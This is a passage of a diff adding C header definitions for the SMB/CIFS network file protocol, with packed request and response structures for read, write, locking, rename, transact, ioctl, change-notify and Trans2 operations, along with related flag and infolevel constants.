++	struct smb_hdr hdr;     /* wct = 12 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u16 Fid;
++	__le32 OffsetLow;
++	__u32 Reserved; /* Timeout */
++	__le16 WriteMode; /* 1 = write through */
++	__le16 Remaining;
++	__le16 Reserved2;
++	__le16 DataLengthLow;
++	__le16 DataOffset;
++	__le16 ByteCount;
++	__u8 Pad;		/* BB check for whether padded to DWORD
++				   boundary and optimum performance here */
++	char Data[];
++} __attribute__((packed)) WRITEX_REQ;
++
++typedef struct smb_com_write_req {
++	struct smb_hdr hdr;	/* wct = 14 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u16 Fid;
++	__le32 OffsetLow;
++	__u32 Reserved;
++	__le16 WriteMode;
++	__le16 Remaining;
++	__le16 DataLengthHigh;
++	__le16 DataLengthLow;
++	__le16 DataOffset;
++	__le32 OffsetHigh;
++	__le16 ByteCount;
++	__u8 Pad;		/* BB check for whether padded to DWORD
++				   boundary and optimum performance here */
++	char Data[];
++} __attribute__((packed)) WRITE_REQ;
++
++typedef struct smb_com_write_rsp {
++	struct smb_hdr hdr;	/* wct = 6 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__le16 Count;
++	__le16 Remaining;
++	__le16 CountHigh;
++	__u16  Reserved;
++	__u16 ByteCount;
++} __attribute__((packed)) WRITE_RSP;
++
++/* legacy read request for older servers */
++typedef struct smb_com_readx_req {
++	struct smb_hdr hdr;	/* wct = 10 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u16 Fid;
++	__le32 OffsetLow;
++	__le16 MaxCount;
++	__le16 MinCount;	/* obsolete */
++	__le32 Reserved;
++	__le16 Remaining;
++	__le16 ByteCount;
++} __attribute__((packed)) READX_REQ;
++
++typedef struct smb_com_read_req {
++	struct smb_hdr hdr;	/* wct = 12 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u16 Fid;
++	__le32 OffsetLow;
++	__le16 MaxCount;
++	__le16 MinCount;		/* obsolete */
++	__le32 MaxCountHigh;
++	__le16 Remaining;
++	__le32 OffsetHigh;
++	__le16 ByteCount;
++} __attribute__((packed)) READ_REQ;
++
++typedef struct smb_com_read_rsp {
++	struct smb_hdr hdr;	/* wct = 12 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__le16 Remaining;
++	__le16 DataCompactionMode;
++	__le16 Reserved;
++	__le16 DataLength;
++	__le16 DataOffset;
++	__le16 DataLengthHigh;
++	__u64 Reserved2;
++	__u16 ByteCount;
++	/* read response data immediately follows */
++} __attribute__((packed)) READ_RSP;
++
++typedef struct locking_andx_range {
++	__le16 Pid;
++	__le16 Pad;
++	__le32 OffsetHigh;
++	__le32 OffsetLow;
++	__le32 LengthHigh;
++	__le32 LengthLow;
++} __attribute__((packed)) LOCKING_ANDX_RANGE;
++
++#define LOCKING_ANDX_SHARED_LOCK     0x01
++#define LOCKING_ANDX_OPLOCK_RELEASE  0x02
++#define LOCKING_ANDX_CHANGE_LOCKTYPE 0x04
++#define LOCKING_ANDX_CANCEL_LOCK     0x08
++#define LOCKING_ANDX_LARGE_FILES     0x10	/* always on for us */
++
++typedef struct smb_com_lock_req {
++	struct smb_hdr hdr;	/* wct = 8 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u16 Fid;
++	__u8 LockType;
++	__u8 OplockLevel;
++	__le32 Timeout;
++	__le16 NumberOfUnlocks;
++	__le16 NumberOfLocks;
++	__le16 ByteCount;
++	LOCKING_ANDX_RANGE Locks[1];
++} __attribute__((packed)) LOCK_REQ;
++
++/* lock type */
++#define CIFS_RDLCK	0
++#define CIFS_WRLCK	1
++#define CIFS_UNLCK      2
++typedef struct cifs_posix_lock {
++	__le16  lock_type;  /* 0 = Read, 1 = Write, 2 = Unlock */
++	__le16  lock_flags; /* 1 = Wait (only valid for setlock) */
++	__le32  pid;
++	__le64	start;
++	__le64	length;
++	/* BB what about additional owner info to identify network client */
++} __attribute__((packed)) CIFS_POSIX_LOCK;
++
++typedef struct smb_com_lock_rsp {
++	struct smb_hdr hdr;	/* wct = 2 */
++	__u8 AndXCommand;
++	__u8 AndXReserved;
++	__le16 AndXOffset;
++	__u16 ByteCount;
++} __attribute__((packed)) LOCK_RSP;
++
++typedef struct smb_com_rename_req {
++	struct smb_hdr hdr;	/* wct = 1 */
++	__le16 SearchAttributes;	/* target file attributes */
++	__le16 ByteCount;
++	__u8 BufferFormat;	/* 4 = ASCII or Unicode */
++	unsigned char OldFileName[1];
++	/* followed by __u8 BufferFormat2 */
++	/* followed by NewFileName */
++} __attribute__((packed)) RENAME_REQ;
++
++	/* copy request flags */
++#define COPY_MUST_BE_FILE      0x0001
++#define COPY_MUST_BE_DIR       0x0002
++#define COPY_TARGET_MODE_ASCII 0x0004 /* if not set, binary */
++#define COPY_SOURCE_MODE_ASCII 0x0008 /* if not set, binary */
++#define COPY_VERIFY_WRITES     0x0010
++#define COPY_TREE              0x0020
++
++typedef struct smb_com_copy_req {
++	struct smb_hdr hdr;	/* wct = 3 */
++	__u16 Tid2;
++	__le16 OpenFunction;
++	__le16 Flags;
++	__le16 ByteCount;
++	__u8 BufferFormat;	/* 4 = ASCII or Unicode */
++	unsigned char OldFileName[1];
++	/* followed by __u8 BufferFormat2 */
++	/* followed by NewFileName string */
++} __attribute__((packed)) COPY_REQ;
++
++typedef struct smb_com_copy_rsp {
++	struct smb_hdr hdr;     /* wct = 1 */
++	__le16 CopyCount;    /* number of files copied */
++	__u16 ByteCount;    /* may be zero */
++	__u8 BufferFormat;  /* 0x04 - only present if errored file follows */
++	unsigned char ErrorFileName[1]; /* only present if error in copy */
++} __attribute__((packed)) COPY_RSP;
++
++#define CREATE_HARD_LINK		0x103
++#define MOVEFILE_COPY_ALLOWED		0x0002
++#define MOVEFILE_REPLACE_EXISTING	0x0001
++
++typedef struct smb_com_nt_rename_req {	/* A5 - also used for create hardlink */
++	struct smb_hdr hdr;	/* wct = 4 */
++	__le16 SearchAttributes;	/* target file attributes */
++	__le16 Flags;		/* spec says Information Level */
++	__le32 ClusterCount;
++	__le16 ByteCount;
++	__u8 BufferFormat;	/* 4 = ASCII or Unicode */
++	unsigned char OldFileName[1];
++	/* followed by __u8 BufferFormat2 */
++	/* followed by NewFileName */
++} __attribute__((packed)) NT_RENAME_REQ;
++
++typedef struct smb_com_rename_rsp {
++	struct smb_hdr hdr;	/* wct = 0 */
++	__u16 ByteCount;	/* bct = 0 */
++} __attribute__((packed)) RENAME_RSP;
++
++typedef struct smb_com_delete_file_req {
++	struct smb_hdr hdr;	/* wct = 1 */
++	__le16 SearchAttributes;
++	__le16 ByteCount;
++	__u8 BufferFormat;	/* 4 = ASCII */
++	unsigned char fileName[1];
++} __attribute__((packed)) DELETE_FILE_REQ;
++
++typedef struct smb_com_delete_file_rsp {
++	struct smb_hdr hdr;	/* wct = 0 */
++	__u16 ByteCount;	/* bct = 0 */
++} __attribute__((packed)) DELETE_FILE_RSP;
++
++typedef struct smb_com_delete_directory_req {
++	struct smb_hdr hdr;	/* wct = 0 */
++	__le16 ByteCount;
++	__u8 BufferFormat;	/* 4 = ASCII */
++	unsigned char DirName[1];
++} __attribute__((packed)) DELETE_DIRECTORY_REQ;
++
++typedef struct smb_com_delete_directory_rsp {
++	struct smb_hdr hdr;	/* wct = 0 */
++	__u16 ByteCount;	/* bct = 0 */
++} __attribute__((packed)) DELETE_DIRECTORY_RSP;
++
++typedef struct smb_com_create_directory_req {
++	struct smb_hdr hdr;	/* wct = 0 */
++	__le16 ByteCount;
++	__u8 BufferFormat;	/* 4 = ASCII */
++	unsigned char DirName[1];
++} __attribute__((packed)) CREATE_DIRECTORY_REQ;
++
++typedef struct smb_com_create_directory_rsp {
++	struct smb_hdr hdr;	/* wct = 0 */
++	__u16 ByteCount;	/* bct = 0 */
++} __attribute__((packed)) CREATE_DIRECTORY_RSP;
++
++typedef struct smb_com_query_information_req {
++	struct smb_hdr hdr;     /* wct = 0 */
++	__le16 ByteCount;	/* 1 + namelen + 1 */
++	__u8 BufferFormat;      /* 4 = ASCII */
++	unsigned char FileName[1];
++} __attribute__((packed)) QUERY_INFORMATION_REQ;
++
++typedef struct smb_com_query_information_rsp {
++	struct smb_hdr hdr;     /* wct = 10 */
++	__le16 attr;
++	__le32  last_write_time;
++	__le32 size;
++	__u16  reserved[5];
++	__le16 ByteCount;	/* bcc = 0 */
++} __attribute__((packed)) QUERY_INFORMATION_RSP;
++
++typedef struct smb_com_setattr_req {
++	struct smb_hdr hdr; /* wct = 8 */
++	__le16 attr;
++	__le16 time_low;
++	__le16 time_high;
++	__le16 reserved[5]; /* must be zero */
++	__u16  ByteCount;
++	__u8   BufferFormat; /* 4 = ASCII */
++	unsigned char fileName[1];
++} __attribute__((packed)) SETATTR_REQ;
++
++typedef struct smb_com_setattr_rsp {
++	struct smb_hdr hdr;     /* wct = 0 */
++	__u16 ByteCount;        /* bct = 0 */
++} __attribute__((packed)) SETATTR_RSP;
++
++/* empty wct response to setattr */
++
++/*******************************************************/
++/* NT Transact structure definitions follow            */
++/* Currently only ioctl, acl (get security descriptor) */
++/* and notify are implemented                          */
++/*******************************************************/
++typedef struct smb_com_ntransact_req {
++	struct smb_hdr hdr; /* wct >= 19 */
++	__u8 MaxSetupCount;
++	__u16 Reserved;
++	__le32 TotalParameterCount;
++	__le32 TotalDataCount;
++	__le32 MaxParameterCount;
++	__le32 MaxDataCount;
++	__le32 ParameterCount;
++	__le32 ParameterOffset;
++	__le32 DataCount;
++	__le32 DataOffset;
++	__u8 SetupCount; /* four setup words follow subcommand */
++	/* SNIA spec incorrectly included spurious pad here */
++	__le16 SubCommand; /* 2 = IOCTL/FSCTL */
++	/* SetupCount words follow then */
++	__le16 ByteCount;
++	__u8 Pad[3];
++	__u8 Parms[];
++} __attribute__((packed)) NTRANSACT_REQ;
++
++typedef struct smb_com_ntransact_rsp {
++	struct smb_hdr hdr;     /* wct = 18 */
++	__u8 Reserved[3];
++	__le32 TotalParameterCount;
++	__le32 TotalDataCount;
++	__le32 ParameterCount;
++	__le32 ParameterOffset;
++	__le32 ParameterDisplacement;
++	__le32 DataCount;
++	__le32 DataOffset;
++	__le32 DataDisplacement;
++	__u8 SetupCount;   /* 0 */
++	__u16 ByteCount;
++	/* __u8 Pad[3]; */
++	/* parms and data follow */
++} __attribute__((packed)) NTRANSACT_RSP;
++
++/* See MS-SMB 2.2.7.2.1.1 */
++struct srv_copychunk {
++	__le64 SourceOffset;
++	__le64 DestinationOffset;
++	__le32 CopyLength;
++	__u32  Reserved;
++} __packed;
++
++typedef struct smb_com_transaction_ioctl_req {
++	struct smb_hdr hdr;	/* wct = 23 */
++	__u8 MaxSetupCount;
++	__u16 Reserved;
++	__le32 TotalParameterCount;
++	__le32 TotalDataCount;
++	__le32 MaxParameterCount;
++	__le32 MaxDataCount;
++	__le32 ParameterCount;
++	__le32 ParameterOffset;
++	__le32 DataCount;
++	__le32 DataOffset;
++	__u8 SetupCount; /* four setup words follow subcommand */
++	/* SNIA spec incorrectly included spurious pad here */
++	__le16 SubCommand; /* 2 = IOCTL/FSCTL */
++	__le32 FunctionCode;
++	__u16 Fid;
++	__u8 IsFsctl;  /* 1 = File System Control 0 = device control (IOCTL) */
++	__u8 IsRootFlag; /* 1 = apply command to root of share (must be DFS) */
++	__le16 ByteCount;
++	__u8 Pad[3];
++	__u8 Data[1];
++} __attribute__((packed)) TRANSACT_IOCTL_REQ;
++
++typedef struct smb_com_transaction_compr_ioctl_req {
++	struct smb_hdr hdr;	/* wct = 23 */
++	__u8 MaxSetupCount;
++	__u16 Reserved;
++	__le32 TotalParameterCount;
++	__le32 TotalDataCount;
++	__le32 MaxParameterCount;
++	__le32 MaxDataCount;
++	__le32 ParameterCount;
++	__le32 ParameterOffset;
++	__le32 DataCount;
++	__le32 DataOffset;
++	__u8 SetupCount; /* four setup words follow subcommand */
++	/* SNIA spec incorrectly included spurious pad here */
++	__le16 SubCommand; /* 2 = IOCTL/FSCTL */
++	__le32 FunctionCode;
++	__u16 Fid;
++	__u8 IsFsctl;  /* 1 = File System Control 0 = device control (IOCTL) */
++	__u8 IsRootFlag; /* 1 = apply command to root of share (must be DFS) */
++	__le16 ByteCount;
++	__u8 Pad[3];
++	__le16 compression_state;  /* See below for valid flags */
++} __attribute__((packed)) TRANSACT_COMPR_IOCTL_REQ;
++
++/* compression state flags */
++#define COMPRESSION_FORMAT_NONE		0x0000
++#define COMPRESSION_FORMAT_DEFAULT	0x0001
++#define COMPRESSION_FORMAT_LZNT1	0x0002
++
++typedef struct smb_com_transaction_ioctl_rsp {
++	struct smb_hdr hdr;	/* wct = 19 */
++	__u8 Reserved[3];
++	__le32 TotalParameterCount;
++	__le32 TotalDataCount;
++	__le32 ParameterCount;
++	__le32 ParameterOffset;
++	__le32 ParameterDisplacement;
++	__le32 DataCount;
++	__le32 DataOffset;
++	__le32 DataDisplacement;
++	__u8 SetupCount;	/* 1 */
++	__le16 ReturnedDataLen;
++	__u16 ByteCount;
++} __attribute__((packed)) TRANSACT_IOCTL_RSP;
++
++#define CIFS_ACL_OWNER 1
++#define CIFS_ACL_GROUP 2
++#define CIFS_ACL_DACL  4
++#define CIFS_ACL_SACL  8
++
++typedef struct smb_com_transaction_qsec_req {
++	struct smb_hdr hdr;     /* wct = 19 */
++	__u8 MaxSetupCount;
++	__u16 Reserved;
++	__le32 TotalParameterCount;
++	__le32 TotalDataCount;
++	__le32 MaxParameterCount;
++	__le32 MaxDataCount;
++	__le32 ParameterCount;
++	__le32 ParameterOffset;
++	__le32 DataCount;
++	__le32 DataOffset;
++	__u8 SetupCount; /* no setup words follow subcommand */
++	/* SNIA spec incorrectly included spurious pad here */
++	__le16 SubCommand; /* 6 = QUERY_SECURITY_DESC */
++	__le16 ByteCount; /* bcc = 3 + 8 */
++	__u8 Pad[3];
++	__u16 Fid;
++	__u16 Reserved2;
++	__le32 AclFlags;
++} __attribute__((packed)) QUERY_SEC_DESC_REQ;
++
++
++typedef struct smb_com_transaction_ssec_req {
++	struct smb_hdr hdr;     /* wct = 19 */
++	__u8 MaxSetupCount;
++	__u16 Reserved;
++	__le32 TotalParameterCount;
++	__le32 TotalDataCount;
++	__le32 MaxParameterCount;
++	__le32 MaxDataCount;
++	__le32 ParameterCount;
++	__le32 ParameterOffset;
++	__le32 DataCount;
++	__le32 DataOffset;
++	__u8 SetupCount; /* no setup words follow subcommand */
++	/* SNIA spec incorrectly included spurious pad here */
++	__le16 SubCommand; /* 3 = SET_SECURITY_DESC */
++	__le16 ByteCount; /* bcc = 3 + 8 */
++	__u8 Pad[3];
++	__u16 Fid;
++	__u16 Reserved2;
++	__le32 AclFlags;
++} __attribute__((packed)) SET_SEC_DESC_REQ;
++
++typedef struct smb_com_transaction_change_notify_req {
++	struct smb_hdr hdr;     /* wct = 23 */
++	__u8 MaxSetupCount;
++	__u16 Reserved;
++	__le32 TotalParameterCount;
++	__le32 TotalDataCount;
++	__le32 MaxParameterCount;
++	__le32 MaxDataCount;
++	__le32 ParameterCount;
++	__le32 ParameterOffset;
++	__le32 DataCount;
++	__le32 DataOffset;
++	__u8 SetupCount; /* four setup words follow subcommand */
++	/* SNIA spec incorrectly included spurious pad here */
++	__le16 SubCommand;/* 4 = Change Notify */
++	__le32 CompletionFilter;  /* operation to monitor */
++	__u16 Fid;
++	__u8 WatchTree;  /* 1 = Monitor subdirectories */
++	__u8 Reserved2;
++	__le16 ByteCount;
++/* 	__u8 Pad[3];*/
++/*	__u8 Data[1];*/
++} __attribute__((packed)) TRANSACT_CHANGE_NOTIFY_REQ;
++
++/* BB eventually change to use generic ntransact rsp struct
++      and validation routine */
++typedef struct smb_com_transaction_change_notify_rsp {
++	struct smb_hdr hdr;	/* wct = 18 */
++	__u8 Reserved[3];
++	__le32 TotalParameterCount;
++	__le32 TotalDataCount;
++	__le32 ParameterCount;
++	__le32 ParameterOffset;
++	__le32 ParameterDisplacement;
++	__le32 DataCount;
++	__le32 DataOffset;
++	__le32 DataDisplacement;
++	__u8 SetupCount;   /* 0 */
++	__u16 ByteCount;
++	/* __u8 Pad[3]; */
++} __attribute__((packed)) TRANSACT_CHANGE_NOTIFY_RSP;
++/* Completion Filter flags for Notify */
++#define FILE_NOTIFY_CHANGE_FILE_NAME    0x00000001
++#define FILE_NOTIFY_CHANGE_DIR_NAME     0x00000002
++#define FILE_NOTIFY_CHANGE_NAME         0x00000003
++#define FILE_NOTIFY_CHANGE_ATTRIBUTES   0x00000004
++#define FILE_NOTIFY_CHANGE_SIZE         0x00000008
++#define FILE_NOTIFY_CHANGE_LAST_WRITE   0x00000010
++#define FILE_NOTIFY_CHANGE_LAST_ACCESS  0x00000020
++#define FILE_NOTIFY_CHANGE_CREATION     0x00000040
++#define FILE_NOTIFY_CHANGE_EA           0x00000080
++#define FILE_NOTIFY_CHANGE_SECURITY     0x00000100
++#define FILE_NOTIFY_CHANGE_STREAM_NAME  0x00000200
++#define FILE_NOTIFY_CHANGE_STREAM_SIZE  0x00000400
++#define FILE_NOTIFY_CHANGE_STREAM_WRITE 0x00000800
++
++#define FILE_ACTION_ADDED		0x00000001
++#define FILE_ACTION_REMOVED		0x00000002
++#define FILE_ACTION_MODIFIED		0x00000003
++#define FILE_ACTION_RENAMED_OLD_NAME	0x00000004
++#define FILE_ACTION_RENAMED_NEW_NAME	0x00000005
++#define FILE_ACTION_ADDED_STREAM	0x00000006
++#define FILE_ACTION_REMOVED_STREAM	0x00000007
++#define FILE_ACTION_MODIFIED_STREAM	0x00000008
++
++/* response contains array of the following structures */
++struct file_notify_information {
++	__le32 NextEntryOffset;
++	__le32 Action;
++	__le32 FileNameLength;
++	__u8  FileName[];
++} __attribute__((packed));
++
++/* For IO_REPARSE_TAG_SYMLINK */
++struct reparse_symlink_data {
++	__le32	ReparseTag;
++	__le16	ReparseDataLength;
++	__u16	Reserved;
++	__le16	SubstituteNameOffset;
++	__le16	SubstituteNameLength;
++	__le16	PrintNameOffset;
++	__le16	PrintNameLength;
++	__le32	Flags;
++	char	PathBuffer[];
++} __attribute__((packed));
++
++/* Flag above */
++#define SYMLINK_FLAG_RELATIVE 0x00000001
++
++/* For IO_REPARSE_TAG_NFS */
++#define NFS_SPECFILE_LNK	0x00000000014B4E4C
++#define NFS_SPECFILE_CHR	0x0000000000524843
++#define NFS_SPECFILE_BLK	0x00000000004B4C42
++#define NFS_SPECFILE_FIFO	0x000000004F464946
++#define NFS_SPECFILE_SOCK	0x000000004B434F53
++struct reparse_posix_data {
++	__le32	ReparseTag;
++	__le16	ReparseDataLength;
++	__u16	Reserved;
++	__le64	InodeType; /* LNK, FIFO, CHR etc. */
++	char	PathBuffer[];
++} __attribute__((packed));
++
++struct cifs_quota_data {
++	__u32	rsrvd1;  /* 0 */
++	__u32	sid_size;
++	__u64	rsrvd2;  /* 0 */
++	__u64	space_used;
++	__u64	soft_limit;
++	__u64	hard_limit;
++	char	sid[1];  /* variable size? */
++} __attribute__((packed));
++
++/* quota sub commands */
++#define QUOTA_LIST_CONTINUE	    0
++#define QUOTA_LIST_START	0x100
++#define QUOTA_FOR_SID		0x101
++
++struct trans2_req {
++	/* struct smb_hdr hdr precedes. Set wct = 14+ */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;
++	__le16 ParameterOffset;
++	__le16 DataCount;
++	__le16 DataOffset;
++	__u8 SetupCount;
++	__u8 Reserved3;
++	__le16 SubCommand; /* 1st setup word - SetupCount words follow */
++	__le16 ByteCount;
++} __attribute__((packed));
++
++struct smb_t2_req {
++	struct smb_hdr hdr;
++	struct trans2_req t2_req;
++} __attribute__((packed));
++
++struct trans2_resp {
++	/* struct smb_hdr hdr precedes. Note wct = 10 + setup count */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__u16 Reserved;
++	__le16 ParameterCount;
++	__le16 ParameterOffset;
++	__le16 ParameterDisplacement;
++	__le16 DataCount;
++	__le16 DataOffset;
++	__le16 DataDisplacement;
++	__u8 SetupCount;
++	__u8 Reserved1;
++	/* SetupWords[SetupCount];
++	__u16 ByteCount;
++	__u16 Reserved2;*/
++	/* data area follows */
++} __attribute__((packed));
++
++struct smb_t2_rsp {
++	struct smb_hdr hdr;
++	struct trans2_resp t2_rsp;
++} __attribute__((packed));
++
++/* PathInfo/FileInfo infolevels */
++#define SMB_INFO_STANDARD                   1
++#define SMB_SET_FILE_EA                     2
++#define SMB_QUERY_FILE_EA_SIZE              2
++#define SMB_INFO_QUERY_EAS_FROM_LIST        3
++#define SMB_INFO_QUERY_ALL_EAS              4
++#define SMB_INFO_IS_NAME_VALID              6
++#define SMB_QUERY_FILE_BASIC_INFO       0x101
++#define SMB_QUERY_FILE_STANDARD_INFO    0x102
++#define SMB_QUERY_FILE_EA_INFO          0x103
++#define SMB_QUERY_FILE_NAME_INFO        0x104
++#define SMB_QUERY_FILE_ALLOCATION_INFO  0x105
++#define SMB_QUERY_FILE_END_OF_FILEINFO  0x106
++#define SMB_QUERY_FILE_ALL_INFO         0x107
++#define SMB_QUERY_ALT_NAME_INFO         0x108
++#define SMB_QUERY_FILE_STREAM_INFO      0x109
++#define SMB_QUERY_FILE_COMPRESSION_INFO 0x10B
++#define SMB_QUERY_FILE_UNIX_BASIC       0x200
++#define SMB_QUERY_FILE_UNIX_LINK        0x201
++#define SMB_QUERY_POSIX_ACL             0x204
++#define SMB_QUERY_XATTR                 0x205  /* e.g. system EA name space */
++#define SMB_QUERY_ATTR_FLAGS            0x206  /* append,immutable etc. */
++#define SMB_QUERY_POSIX_PERMISSION      0x207
++#define SMB_QUERY_POSIX_LOCK            0x208
++/* #define SMB_POSIX_OPEN               0x209 */
++/* #define SMB_POSIX_UNLINK             0x20a */
++#define SMB_QUERY_FILE__UNIX_INFO2      0x20b
++#define SMB_QUERY_FILE_INTERNAL_INFO    0x3ee
++#define SMB_QUERY_FILE_ACCESS_INFO      0x3f0
++#define SMB_QUERY_FILE_NAME_INFO2       0x3f1 /* 0x30 bytes */
++#define SMB_QUERY_FILE_POSITION_INFO    0x3f6
++#define SMB_QUERY_FILE_MODE_INFO        0x3f8
++#define SMB_QUERY_FILE_ALGN_INFO        0x3f9
++
++
++#define SMB_SET_FILE_BASIC_INFO	        0x101
++#define SMB_SET_FILE_DISPOSITION_INFO   0x102
++#define SMB_SET_FILE_ALLOCATION_INFO    0x103
++#define SMB_SET_FILE_END_OF_FILE_INFO   0x104
++#define SMB_SET_FILE_UNIX_BASIC         0x200
++#define SMB_SET_FILE_UNIX_LINK          0x201
++#define SMB_SET_FILE_UNIX_HLINK         0x203
++#define SMB_SET_POSIX_ACL               0x204
++#define SMB_SET_XATTR                   0x205
++#define SMB_SET_ATTR_FLAGS              0x206  /* append, immutable etc. */
++#define SMB_SET_POSIX_LOCK              0x208
++#define SMB_POSIX_OPEN                  0x209
++#define SMB_POSIX_UNLINK                0x20a
++#define SMB_SET_FILE_UNIX_INFO2         0x20b
++#define SMB_SET_FILE_BASIC_INFO2        0x3ec
++#define SMB_SET_FILE_RENAME_INFORMATION 0x3f2 /* BB check if qpathinfo too */
++#define SMB_FILE_ALL_INFO2              0x3fa
++#define SMB_SET_FILE_ALLOCATION_INFO2   0x3fb
++#define SMB_SET_FILE_END_OF_FILE_INFO2  0x3fc
++#define SMB_FILE_MOVE_CLUSTER_INFO      0x407
++#define SMB_FILE_QUOTA_INFO             0x408
++#define SMB_FILE_REPARSEPOINT_INFO      0x409
++#define SMB_FILE_MAXIMUM_INFO           0x40d
++
++/* Find File infolevels */
++#define SMB_FIND_FILE_INFO_STANDARD       0x001
++#define SMB_FIND_FILE_QUERY_EA_SIZE       0x002
++#define SMB_FIND_FILE_QUERY_EAS_FROM_LIST 0x003
++#define SMB_FIND_FILE_DIRECTORY_INFO      0x101
++#define SMB_FIND_FILE_FULL_DIRECTORY_INFO 0x102
++#define SMB_FIND_FILE_NAMES_INFO          0x103
++#define SMB_FIND_FILE_BOTH_DIRECTORY_INFO 0x104
++#define SMB_FIND_FILE_ID_FULL_DIR_INFO    0x105
++#define SMB_FIND_FILE_ID_BOTH_DIR_INFO    0x106
++#define SMB_FIND_FILE_UNIX                0x202
++/* #define SMB_FIND_FILE_POSIX_INFO          0x064 */
++
++typedef struct smb_com_transaction2_qpi_req {
++	struct smb_hdr hdr;	/* wct = 14+ */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;
++	__le16 ParameterOffset;
++	__le16 DataCount;
++	__le16 DataOffset;
++	__u8 SetupCount;
++	__u8 Reserved3;
++	__le16 SubCommand;	/* one setup word */
++	__le16 ByteCount;
++	__u8 Pad;
++	__le16 InformationLevel;
++	__u32 Reserved4;
++	char FileName[1];
++} __attribute__((packed)) TRANSACTION2_QPI_REQ;
++
++typedef struct smb_com_transaction2_qpi_rsp {
++	struct smb_hdr hdr;	/* wct = 10 + SetupCount */
++	struct trans2_resp t2;
++	__u16 ByteCount;
++	__u16 Reserved2; /* parameter word is present for infolevels > 100 */
++} __attribute__((packed)) TRANSACTION2_QPI_RSP;
++
++typedef struct smb_com_transaction2_spi_req {
++	struct smb_hdr hdr;	/* wct = 15 */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;
++	__le16 ParameterOffset;
++	__le16 DataCount;
++	__le16 DataOffset;
++	__u8 SetupCount;
++	__u8 Reserved3;
++	__le16 SubCommand;	/* one setup word */
++	__le16 ByteCount;
++	__u8 Pad;
++	__u16 Pad1;
++	__le16 InformationLevel;
++	__u32 Reserved4;
++	char FileName[1];
++} __attribute__((packed)) TRANSACTION2_SPI_REQ;
++
++typedef struct smb_com_transaction2_spi_rsp {
++	struct smb_hdr hdr;	/* wct = 10 + SetupCount */
++	struct trans2_resp t2;
++	__u16 ByteCount;
++	__u16 Reserved2; /* parameter word is present for infolevels > 100 */
++} __attribute__((packed)) TRANSACTION2_SPI_RSP;
++
++struct set_file_rename {
++	__le32 overwrite;   /* 1 = overwrite dest */
++	__u32 root_fid;   /* zero */
++	__le32 target_name_len;
++	char  target_name[];  /* Must be unicode */
++} __attribute__((packed));
++
++struct smb_com_transaction2_sfi_req {
++	struct smb_hdr hdr;	/* wct = 15 */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;
++	__le16 ParameterOffset;
++	__le16 DataCount;
++	__le16 DataOffset;
++	__u8 SetupCount;
++	__u8 Reserved3;
++	__le16 SubCommand;	/* one setup word */
++	__le16 ByteCount;
++	__u8 Pad;
++	__u16 Pad1;
++	__u16 Fid;
++	__le16 InformationLevel;
++	__u16 Reserved4;
++	__u8  payload[];
++} __attribute__((packed));
++
++struct smb_com_transaction2_sfi_rsp {
++	struct smb_hdr hdr;	/* wct = 10 + SetupCount */
++	struct trans2_resp t2;
++	__u16 ByteCount;
++	__u16 Reserved2;	/* parameter word reserved -
++					present for infolevels > 100 */
++} __attribute__((packed));
++
++struct smb_t2_qfi_req {
++	struct	smb_hdr hdr;
++	struct	trans2_req t2;
++	__u8	Pad;
++	__u16	Fid;
++	__le16	InformationLevel;
++} __attribute__((packed));
++
++struct smb_t2_qfi_rsp {
++	struct smb_hdr hdr;     /* wct = 10 + SetupCount */
++	struct trans2_resp t2;
++	__u16 ByteCount;
++	__u16 Reserved2;        /* parameter word reserved -
++				   present for infolevels > 100 */
++} __attribute__((packed));
++
++/*
++ * Flags on T2 FINDFIRST and FINDNEXT
++ */
++#define CIFS_SEARCH_CLOSE_ALWAYS  0x0001
++#define CIFS_SEARCH_CLOSE_AT_END  0x0002
++#define CIFS_SEARCH_RETURN_RESUME 0x0004
++#define CIFS_SEARCH_CONTINUE_FROM_LAST 0x0008
++#define CIFS_SEARCH_BACKUP_SEARCH 0x0010
++
++/*
++ * Size of the resume key on FINDFIRST and FINDNEXT calls
++ */
++#define CIFS_SMB_RESUME_KEY_SIZE 4
++
++typedef struct smb_com_transaction2_ffirst_req {
++	struct smb_hdr hdr;	/* wct = 15 */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;
++	__le16 ParameterOffset;
++	__le16 DataCount;
++	__le16 DataOffset;
++	__u8 SetupCount;	/* one */
++	__u8 Reserved3;
++	__le16 SubCommand;	/* TRANS2_FIND_FIRST */
++	__le16 ByteCount;
++	__u8 Pad;
++	__le16 SearchAttributes;
++	__le16 SearchCount;
++	__le16 SearchFlags;
++	__le16 InformationLevel;
++	__le32 SearchStorageType;
++	char FileName[1];
++} __attribute__((packed)) TRANSACTION2_FFIRST_REQ;
++
